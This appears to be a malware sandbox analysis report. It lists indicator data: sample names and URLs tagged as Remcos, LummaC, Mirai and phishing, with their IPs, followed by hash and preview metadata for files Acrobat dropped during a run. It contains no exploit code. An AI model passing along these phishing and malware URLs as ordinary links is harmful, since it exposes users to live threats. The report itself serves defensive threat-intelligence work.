                                                                                        Onboard Training Checklist v1.1 - Wyatt Young (1).xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        94e.exeGet hashmaliciousRemcosBrowse
                                                                                        • 199.232.214.172
                                                                                        https://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                                                        • 199.232.210.172
                                                                                        T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                                        • 199.232.210.172
                                                                                        Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                                        • 199.232.214.172
                                                                                        mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                                        • 199.232.214.172
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        FASTLYUShttps://property-management-portal.replit.app/%2520%2522https:/property-management-portal.replit.app/%2522Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.2.208
                                                                                        https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                        • 151.101.2.137
                                                                                        https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.194.137
                                                                                        https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.194.137
                                                                                        Play Aud.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.66.137
                                                                                        vFile__0054seconds__Airborn.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.194.137
                                                                                        https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.64.84
                                                                                        http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.195.9
                                                                                        https://www.cocol88.site/l6v3z.phpGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.193.229
                                                                                        https://hidfjdfjkdfkjfdjk.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.1.46
                                                                                        UNIFIEDLAYER-AS-1USnklarm.elfGet hashmaliciousUnknownBrowse
                                                                                        • 162.144.117.245
                                                                                        https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                        • 162.215.210.151
                                                                                        7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 69.49.245.172
                                                                                        nshmips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 173.254.77.37
                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 108.167.180.57
                                                                                        arm5.elfGet hashmaliciousMiraiBrowse
                                                                                        • 50.87.110.185
                                                                                        la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                        • 198.154.210.10
                                                                                        https://google.com.mx//url?ob=pkmcekw7bljbM2dWBuuV7ic1KFgH&aw=f_rand_string_lowercase(8)n9QXkBk0w4OyBDvUpuk&sa=t&whi=f_rand_string_lowercase(8)zOPGXNRztppHiTbPIt5f&url=amp%2Fbraverygray.com/.dd/KcxwjqsanE-SUREDANN-bXdlYmJAd2luZHNvcmhvbWVzdHguY29tGet hashmaliciousFake Captcha, HTMLPhisherBrowse
                                                                                        • 162.241.114.35
                                                                                        https://contractorssteelform1flows.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 192.185.57.244
                                                                                        CLOUDFLARENETUS3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.157.254
                                                                                        oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.66.86
                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.157.254
                                                                                        LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.63.229
                                                                                        O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                        • 104.21.36.201
                                                                                        2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.199.72
                                                                                        J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.209.202
                                                                                        y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                        • 172.67.199.72
                                                                                        tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.199.72
                                                                                        iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.199.72
                                                                                        CLOUDFLARENETUS3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.157.254
                                                                                        oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.66.86
                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.157.254
                                                                                        LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.63.229
                                                                                        O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                        • 104.21.36.201
                                                                                        2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.199.72
                                                                                        J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.209.202
                                                                                        y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                        • 172.67.199.72
                                                                                        tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.199.72
                                                                                        iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.199.72
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.125685017689551
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:C2q2Pwkn2nKuAl9OmbnIFUt8z6CXZmw+z6CFkwOwkn2nKuAl9OmbjLJ:FvYfHAahFUt8WCX/+WCF5JfHAaSJ
                                                                                        MD5:6C605A39F9E9CD0ABBF3923FE8093048
                                                                                        SHA1:06B0A8D1E00082DEEA3B23FE2D7A4CED7CF13458
                                                                                        SHA-256:13CE3C42327631DD7E9DE207AE9BBD14C89205A0C02838FD38B5F4DBCF4EA687
                                                                                        SHA-512:9CCD6A359B3EB325AD6E59C4CF81B6F7754AD100552A7AB661ABDBB7A0435FF1A336B64DA46B3C65623192A0B6496386082B6DB048DECB44203DDCDC58EDCBBE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/24-03:17:21.717 1c40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/24-03:17:21.720 1c40 Recovering log #3.2024/12/24-03:17:21.720 1c40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.125685017689551
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:C2q2Pwkn2nKuAl9OmbnIFUt8z6CXZmw+z6CFkwOwkn2nKuAl9OmbjLJ:FvYfHAahFUt8WCX/+WCF5JfHAaSJ
                                                                                        MD5:6C605A39F9E9CD0ABBF3923FE8093048
                                                                                        SHA1:06B0A8D1E00082DEEA3B23FE2D7A4CED7CF13458
                                                                                        SHA-256:13CE3C42327631DD7E9DE207AE9BBD14C89205A0C02838FD38B5F4DBCF4EA687
                                                                                        SHA-512:9CCD6A359B3EB325AD6E59C4CF81B6F7754AD100552A7AB661ABDBB7A0435FF1A336B64DA46B3C65623192A0B6496386082B6DB048DECB44203DDCDC58EDCBBE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/24-03:17:21.717 1c40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/24-03:17:21.720 1c40 Recovering log #3.2024/12/24-03:17:21.720 1c40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):336
                                                                                        Entropy (8bit):5.196704045496428
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:CvQq2Pwkn2nKuAl9Ombzo2jMGIFUt8zvXZmw+z6FrkwOwkn2nKuAl9Ombzo2jMmd:vvYfHAa8uFUt8j/+k5JfHAa8RJ
                                                                                        MD5:54264F9940AA0B7698A25636CB9F1B83
                                                                                        SHA1:BC4DA71582377D4EB897C78C020EDC981358687C
                                                                                        SHA-256:0FB4FF30A9F48824FB06C427287D8B7BB0A7FA5DDF8F99A7B93D0F0D818EBE98
                                                                                        SHA-512:C52079A560C974190DAB367DD3F21E4E990E3CCDFB10D0F29D8704CB07951E1169E5FFDDA9D6CCF8DE48E354C2D82D5E345747EF3D482A301265C407E81362E2
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/24-03:17:21.757 1cf4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/24-03:17:21.764 1cf4 Recovering log #3.2024/12/24-03:17:21.765 1cf4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):336
                                                                                        Entropy (8bit):5.196704045496428
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:CvQq2Pwkn2nKuAl9Ombzo2jMGIFUt8zvXZmw+z6FrkwOwkn2nKuAl9Ombzo2jMmd:vvYfHAa8uFUt8j/+k5JfHAa8RJ
                                                                                        MD5:54264F9940AA0B7698A25636CB9F1B83
                                                                                        SHA1:BC4DA71582377D4EB897C78C020EDC981358687C
                                                                                        SHA-256:0FB4FF30A9F48824FB06C427287D8B7BB0A7FA5DDF8F99A7B93D0F0D818EBE98
                                                                                        SHA-512:C52079A560C974190DAB367DD3F21E4E990E3CCDFB10D0F29D8704CB07951E1169E5FFDDA9D6CCF8DE48E354C2D82D5E345747EF3D482A301265C407E81362E2
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/24-03:17:21.757 1cf4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/24-03:17:21.764 1cf4 Recovering log #3.2024/12/24-03:17:21.765 1cf4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.975194181232781
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1SsBdOg2HJcaq3QYiubInP7E4TX:Y2sRdsCXdMHw3QYhbG7n7
                                                                                        MD5:F6D1DCE8F49B3317ECDBE5DF6C7D85D6
                                                                                        SHA1:5FE8910CA06794C46515133D5AE54046BE5D8475
                                                                                        SHA-256:F10B9D9E9D64027E4BD8EA04AF3D928D7B29AE39D38DEB5EB6F447599A9D14A7
                                                                                        SHA-512:E329F00C37F0AA6355FD1417D04F7701F1803C217837F8F9891CC6008F84101BB85D7C11A0FADF371ABD9CEE2560093A6CC0F43103BB7D78316AD4F4141C0E5E
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379588250197259","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":626568},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.975194181232781
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1SsBdOg2HJcaq3QYiubInP7E4TX:Y2sRdsCXdMHw3QYhbG7n7
                                                                                        MD5:F6D1DCE8F49B3317ECDBE5DF6C7D85D6
                                                                                        SHA1:5FE8910CA06794C46515133D5AE54046BE5D8475
                                                                                        SHA-256:F10B9D9E9D64027E4BD8EA04AF3D928D7B29AE39D38DEB5EB6F447599A9D14A7
                                                                                        SHA-512:E329F00C37F0AA6355FD1417D04F7701F1803C217837F8F9891CC6008F84101BB85D7C11A0FADF371ABD9CEE2560093A6CC0F43103BB7D78316AD4F4141C0E5E
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379588250197259","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":626568},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5638
                                                                                        Entropy (8bit):5.252425253053195
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo73XRxWXEFhw76uxVquFZ:etJCV4FiN/jTN/2r8Mta02fEhgO73goQ
                                                                                        MD5:A06B2648F199C44FABA3306B8EC0196F
                                                                                        SHA1:6844D7CA51CE67700C50D9AC3472C7F2C0DAA2D3
                                                                                        SHA-256:50B6CD3CA4426F66A79DD784BE04514D5833615AB0901C2693289B14B811B248
                                                                                        SHA-512:E4F35DD75CC6ECD5AA65863DC168D3E22B7AFF16F4D069EAFD6D4C24259D5A5EDE335354C7BE3136CA316FF537A297E34E2EE17E5A54730766FDA4F71B979E57
                                                                                        Malicious:false
                                                                                        Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):324
                                                                                        Entropy (8bit):5.196713231333307
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Cr3q2Pwkn2nKuAl9OmbzNMxIFUt8zrHNXZmw+zrekwOwkn2nKuAl9OmbzNMFLJ:UvYfHAa8jFUt8NX/++5JfHAa84J
                                                                                        MD5:832A64E09F468D1FFD112D07F0F929B2
                                                                                        SHA1:7343F604825F0691DAC0AA7A8BB6D5B71344886B
                                                                                        SHA-256:DCA5529E957993C500B0CB18A3ABFEB6FB1AF272B9B26CC3A419080DE10E8FF8
                                                                                        SHA-512:43029F7492316F4B7CCC023AC1BCDAB9AB1CBDA25FB4B7B87F03D7076843CE096BE90DDB3B4FD7E56B026F1B756414F5A50E81899954CF06C3F531C21EC7380D
                                                                                        Malicious:false
                                                                                        Preview:2024/12/24-03:17:22.755 1cf4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/24-03:17:22.930 1cf4 Recovering log #3.2024/12/24-03:17:22.957 1cf4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):324
                                                                                        Entropy (8bit):5.196713231333307
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Cr3q2Pwkn2nKuAl9OmbzNMxIFUt8zrHNXZmw+zrekwOwkn2nKuAl9OmbzNMFLJ:UvYfHAa8jFUt8NX/++5JfHAa84J
                                                                                        MD5:832A64E09F468D1FFD112D07F0F929B2
                                                                                        SHA1:7343F604825F0691DAC0AA7A8BB6D5B71344886B
                                                                                        SHA-256:DCA5529E957993C500B0CB18A3ABFEB6FB1AF272B9B26CC3A419080DE10E8FF8
                                                                                        SHA-512:43029F7492316F4B7CCC023AC1BCDAB9AB1CBDA25FB4B7B87F03D7076843CE096BE90DDB3B4FD7E56B026F1B756414F5A50E81899954CF06C3F531C21EC7380D
                                                                                        Malicious:false
                                                                                        Preview:2024/12/24-03:17:22.755 1cf4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/24-03:17:22.930 1cf4 Recovering log #3.2024/12/24-03:17:22.957 1cf4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                        Category:dropped
                                                                                        Size (bytes):65110
                                                                                        Entropy (8bit):1.5364242637381622
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:YfTIEqb0turRy8izzzzzzzz7aq6pzzzzzzzzzzzC:Yo0turRBU
                                                                                        MD5:FFBD07BCC59726A5C7A209CFB8183AC1
                                                                                        SHA1:8033711E9736A605F36549A543A5BBD8EF0A5212
                                                                                        SHA-256:DD2BBF1856C2F3D514B594D1C2478AFAABE4ADEEFD6566BB80B3F5B3881A807A
                                                                                        SHA-512:BBFD9172269FB913D08D6CEEAF3B9A1DEF99E36152DEB922E93CD6DA924F2FBD9E62ABA13C207F1534E23376B2F5897087BD1D3F2595B59F32A60FE05F2104BA
                                                                                        Malicious:false
                                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                        Category:dropped
                                                                                        Size (bytes):86016
                                                                                        Entropy (8bit):4.445044935050837
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:yezci5tciBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r7s3OazzU89UTTgUL
                                                                                        MD5:A1851EAA88B646839BC3BEED919CFB14
                                                                                        SHA1:D0E77F331C7CE26D42D992B573B11162B2F3471D
                                                                                        SHA-256:A934A56B96D237ED7B267BAB1A2FEFDF81504DF1A4A46D294D981A889C34181A
                                                                                        SHA-512:45CAC0EA53BFFC6E84C4163B701C856721B574708A8822F0CB70164CCDB3D027B866D304ED364748EFE4EB881C6034094A0A0AFD988AB1973ACE709FF28F3077
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):3.7754454701674858
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7MSp/E2ioyVWioy9oWoy1Cwoy1yKOioy1noy1AYoy1Wioy1hioybioyEoy1noy1b:7FpjuWFZXKQZcb9IVXEBodRBk2
                                                                                        MD5:183C0C1D1265BC038DD4CD2F2171F32A
                                                                                        SHA1:9AACAAB81F0C3EB70F6BE275A0F708D446F63A7E
                                                                                        SHA-256:CF8BE81209D4FF133CA6A64880386542A63B231F68675BB5EC202307B27C77F6
                                                                                        SHA-512:0D2E54EFE83524D2E1CB5CA429916F90D454270674ECA0C3CA47881630DE0C7BFAC51862863C35AB4CF9975CBDA85CAD1B6713583536CD6ECCE45D48BE699060
                                                                                        Malicious:false
                                                                                        Preview:.... .c.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Certificate, Version=3
                                                                                        Category:dropped
                                                                                        Size (bytes):1391
                                                                                        Entropy (8bit):7.705940075877404
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                        Malicious:false
                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):71954
                                                                                        Entropy (8bit):7.996617769952133
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                        Malicious:false
                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):2.7569015731729736
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kkFklLmn+klfllXlE/HT8kqJXNNX8RolJuRdxLlGB9lQRYwpDdt:kKVn6T8vNMa8RdWBwRd
                                                                                        MD5:1424F531E3D10D78BDADC3683D506276
                                                                                        SHA1:242EAB13CCF4428C1EAEEBEE93684FB2186E89B6
                                                                                        SHA-256:9B649B4A41EAE37083FFF7B7318DC780048A6C30DDC517A3355874B887813B8F
                                                                                        SHA-512:3F2F544D50F52C1670D805CA75A70C56514D7845939008BD23A7B2A5AA10357D421FE10FFE67451077A81CD9D4275E3414CA0E3E5E4910348598BFA3E5273FA5
                                                                                        Malicious:false
                                                                                        Preview:p...... ........x..G.U..(....................................................... ..........W....q...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):328
                                                                                        Entropy (8bit):3.150184159866505
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kK/k9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XnDnLNkPlE99SNxAhUe/3
                                                                                        MD5:32A4742C24E1E414D85680D9E55645BC
                                                                                        SHA1:2A9DBCE999C940914FEA4A3366BD86A4D7480846
                                                                                        SHA-256:8C38791F592F3D254EA5C8438DB9660DF1C2B6454AD5AEFE722B6E4167092919
                                                                                        SHA-512:1F22088DDB8FE36931A97E97C659DB71676CC332366A1C417BDC70B3CB771C4391B8B01FAF8FA382D8D7E530AB09E5AC3FCC0A92E1DFC5DF47F875642819113D
                                                                                        Malicious:false
